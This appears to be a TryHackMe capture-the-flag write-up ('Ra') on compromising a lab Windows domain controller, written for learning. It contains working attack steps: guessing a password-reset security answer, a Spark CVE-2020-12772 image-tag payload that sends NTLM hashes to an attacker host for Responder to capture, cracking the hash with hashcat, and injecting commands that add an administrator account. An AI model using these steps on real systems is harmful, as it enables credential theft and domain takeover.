THM Writeup: Ra
In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing a password reset function on a website, and elevating my privileges on the domain controller using CVE-2020–12772 to gather all the challenge flags. This challenge is available on the TryHackMe platform and is titled “Ra”, created by the users “4ndr34z” and “demoteaching”.
Disclaimer
I like to add a brief disclaimer before a writeup to encourage people to attempt the room before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, lets get started!
Challenge Description
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
Port Enumeration
I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports.
nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report -Pn 10.10.241.18PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 125
80/tcp open http syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
389/tcp open ldap syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
464/tcp open kpasswd5 syn-ack ttl 125
593/tcp open http-rpc-epmap syn-ack ttl 125
636/tcp open ldapssl syn-ack ttl 125
2179/tcp open vmrdp syn-ack ttl 125
3268/tcp open globalcatLDAP syn-ack ttl 125
3269/tcp open globalcatLDAPssl syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5223/tcp open hpvirtgrp syn-ack ttl 125
5229/tcp open jaxflow syn-ack ttl 125
5262/tcp open unknown syn-ack ttl 125
5263/tcp open unknown syn-ack ttl 125
5269/tcp open xmpp-server syn-ack ttl 125
5270/tcp open xmp syn-ack ttl 125
5275/tcp open unknown syn-ack ttl 125
5276/tcp open unknown syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
7070/tcp open realserver syn-ack ttl 125
7443/tcp open oracleas-https syn-ack ttl 125
7777/tcp open cbt syn-ack ttl 125
9090/tcp open zeus-admin syn-ack ttl 125
9091/tcp open xmltec-xmlmail syn-ack ttl 125
9389/tcp open adws syn-ack ttl 125
49671/tcp open unknown syn-ack ttl 125
49672/tcp open unknown syn-ack ttl 125
49673/tcp open unknown syn-ack ttl 125
49674/tcp open unknown syn-ack ttl 125
49694/tcp open unknown syn-ack ttl 125
49894/tcp open unknown syn-ack ttl 125
Reviewing the output, I can see that there are thirty-five ports open. I next used NMAP to identify the services running on each port and used the common NSE scripts to find any common vulnerabilities that I could exploit.
nmap -sV -sC -Pn -v -oN nmap-report -p 53,80,88,135,139,389,445,464,593,636,2179,3268,3269,3389,5223,5229,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9090,9091,9389,49671,49672,49673,49674,49694,49894 10.10.215.202I can see a lot of output from NMAP and some interesting services that I can further enumerate.
Web Enumeration
Reviewing the output from the NMAP service scan, I can see a website is accessible on port 80.
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.I also noted that NMAP had found useful information while scanning port 3389 about some potential domains.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-27T10:03:02+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thmI added windcorp.thm to my hosts file and navigated to the website. I identified a password reset link on the website, which required me to add an additional subdomain called fire.windcorp.thm to my hosts file.
Once the subdomain was added to my hosts file, I can see the password reset requires me to submit a valid username and answer a security question.
I found a list of IT Support Staff on the website but I did not have any luck trying to reset their passwords.
Attempting to navigate to any of the support staff links throws an error.
I noted that under the list of support staff was a link to Spark, which according to their project webpage:
Spark is an Open Source, cross-platform IM client optimized for businesses and organizations. It features built-in support for group chat, telephony integration, and strong security. It also offers a great end-user experience with features like in-line spell checking, group chat room bookmarks, and tabbed conversations. Combined with the Openfire server, Spark is the easiest and best alternative to using un-secure public IM networks.
I could see from the NMAP scan output, that the Openfire Admin Console was accessible over port 9090 but I did not have any luck attempting to login.
I also tried fuzzing for any hidden directories with FFuF but did not find anything of interest. After spending some more time enumerating, I noticed that there were three employee names at the bottom of the page and interestingly, one of them was holding a dog.
One of the security questions asked when resetting a password is to provide the name of your favorite pet. If I open the image in a new tab, I can see that the name of the image includes the owners username and her pets name.
I can now reset the user lilyle password.
SMB Enumeration
Previously, I had not been able to enumerate any SMB shares but now I could use lilyle’s credentials to gain access.
smbclient -L //10.10.215.202 -U lilyle
Enter WORKGROUP\lilyle's password:Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
Users Disk
The SMB shares called Shared and Users were interesting to note. Looking inside the Shared directory, I found the first flag and several spark executable files for different platforms.
smbclient //10.10.6.185/Shared -U lilyle
smb: \> dir
. D 0 Sat May 30 01:45:42 2020
.. D 0 Sat May 30 01:45:42 2020
Flag 1.txt A 45 Fri May 1 16:32:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 01:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 12:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 12:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 12:07:24 2020
In the Users folder, I can see all the different users setup on the domain controller.
. DR 0 Sat May 2 23:05:58 2020
.. DR 0 Sat May 2 23:05:58 2020
Administrator D 0 Sun May 10 12:18:11 2020
All Users DHSrn 0 Sat Sep 15 08:28:48 2018
angrybird D 0 Fri May 1 13:59:20 2020
berg D 0 Fri May 1 13:59:20 2020
bluefrog579 D 0 Fri May 1 13:59:20 2020
brittanycr D 0 Sun May 3 00:36:46 2020
brownostrich284 D 0 Fri May 1 13:59:20 2020
buse D 0 Sun Mar 27 18:20:18 2022
Default DHR 0 Fri May 1 00:35:11 2020
Default User DHSrn 0 Sat Sep 15 08:28:48 2018
desktop.ini AHS 174 Sat Sep 15 08:16:48 2018
edward D 0 Fri May 1 13:59:20 2020
freddy D 0 Sun May 3 00:30:16 2020
garys D 0 Fri May 1 13:59:20 2020
goldencat416 D 0 Sun Mar 27 19:21:06 2022
goldenwol D 0 Fri May 1 13:59:20 2020
happ D 0 Fri May 1 13:59:20 2020
happyme D 0 Fri May 1 13:59:20 2020
Luis D 0 Fri May 1 13:59:20 2020
orga D 0 Fri May 1 13:59:20 2020
organicf D 0 Fri May 1 13:59:20 2020
organicfish718 D 0 Sun Mar 27 19:21:59 2022
pete D 0 Fri May 1 13:59:20 2020
Public DR 0 Thu Apr 30 15:35:47 2020
purplecat D 0 Fri May 1 13:59:20 2020
purplepanda D 0 Fri May 1 13:59:20 2020
sadswan D 0 Fri May 1 13:59:20 2020
sadswan869 D 0 Sun Mar 27 19:23:23 2022
sheela D 0 Fri May 1 13:59:20 2020
silver D 0 Fri May 1 13:59:20 2020
smallf D 0 Fri May 1 13:59:20 2020
spiff D 0 Fri May 1 13:59:20 2020
tinygoos D 0 Fri May 1 13:59:20 2020
whiteleopard D 0 Fri May 1 13:59:20 2020Spark Exploit (CVE-2020–12772)
I can see that Spark version 2.8.3 was installed. Performing a quick search for exploits related to this version, I found a Github page created by the challenge designers that outlines a vulnerability related to Spark version 2.8.3. According to the vulnerability description provided on the Github page:
When we opened a chat with another user, we could send an
<imgtag to that user with an external URL as the source of that image, like this:
<img src=[external_ip]/test.img>Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!
By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).
To exploit this vulnerability, I started by downloading, installing and running Spark 2.8.3 app.
sudo dpkg -i spark_2_8_3.debAfter launching Spark, I provided the credentials and domain details.
I also needed to go into advanced settings and check two boxes to avoid getting a certificate error.
While enumerating the website earlier, I had noted that the icon for the user Buse Candan was always green, while the other users icons fluctuated between grey and amber. I assumed that this indicated the user was active and could be used to perform the exploit.
I searched for Buse in contacts on the Spark app and opened a chat window.
Next, I started up responder to capture the NTMLv2 hash for the user Buse and use it to gain access to the user’s account, thus escalating our privileges.
Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
python3 /usr/share/responder/Responder.py -I tun0 -rdwvNext, I sent the image tag to the user Buse, as seen below.
Responder captures the GET request from the user Buse to our external host, which includes the user’s NTLMv2 hash!
Finally, I can use hashcat to crack the NTLMv2 hash and retrieve the password for the user Buse.
hashcat64.exe -m 5600 hash.txt rockyou.txt
Using these credentials, I could now attempt to login using evil-winrm and get the second flag.
evil-winrm -i windcorp.thm -u buse -p <...........> -N
Windows Privilege Escalation
I started by performing some basic manual user enumeration and noted that the user Buse is a member of the Account Operators group, which allows us to add users.
whoami /groupsGroup Name Type
========================================= ================
Everyone Well-known group
BUILTIN\Users Alias
BUILTIN\Pre-Windows 2000 Compatible Access Alias
BUILTIN\Account Operators Alias
BUILTIN\Remote Desktop Users Alias
BUILTIN\Remote Management Users Alias
Continuing my enumeration, I also found a suspicious folder called scripts located in the C drive.
*Evil-WinRM* PS C:\> dirDirectory: C:\Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/2/2020 6:33 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 5/8/2020 7:43 AM Program Files
d----- 5/7/2020 2:51 AM Program Files (x86)
d----- 5/3/2020 5:48 AM scripts
d----- 5/29/2020 5:45 PM Shared
d-r--- 5/2/2020 3:05 PM Users
d----- 5/30/2020 7:00 AM Windows
The scripts folder contained a PowerShell script called checkservers.ps1, which is used to check a file called hosts.txt located in “C:\Users\brittanycr\” and passes the contents of the host file to Invoke-Expression.
If we can modify the hosts.txt file and include a command to add a new user, it will be executed as Administrator. To achieve this, I can change the credentials of the user brittanycr, since buse is a member of the Account Operators Group.
*Evil-WinRM* PS C:\scripts> net user brittanycr SecretPass1234 /domainThe command completed successfully.
I was not able to use evil-winrm to establish a remote connection with the brittanycr user. Earlier, I had noted that it was possible to access the Users folder through SMB. I created a new hosts.txt file and included a command, that when executed, would add a new user called hacktivities.
; net user hacktivities Pass1234$ /add; net localgroup Administrators hacktivities /addNext, I used smbclient to connect to the Users share with brittanycr’s credentials and uploaded the new hosts.txt file from my attacking machine.
smbclient //10.10.252.35/Users -U brittanycr
smb: \> cd brittanycr\
smb: \brittanycr\> dir
. D 0 Sun May 3 00:36:46 2020
.. D 0 Sun May 3 00:36:46 2020
hosts.txt A 22 Sun May 3 14:44:57 2020smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)
To check if the user hacktivities has been added, I can use crackmapexec to verify it’s existence.
crackmapexec smb windcorp.thm -u hacktivities -p Pass1234$
I can see that the account is successfully added. I can now use evil-winrm to login and retrieve the final flag.
Final Thoughts
I really enjoyed working through this room and getting the opportunity to learn more about exploiting an Active Directory domain controller. The challenge had a nice progression and required good enumeration skills to complete. Thank you for reading till the end and keep hacking 😄!
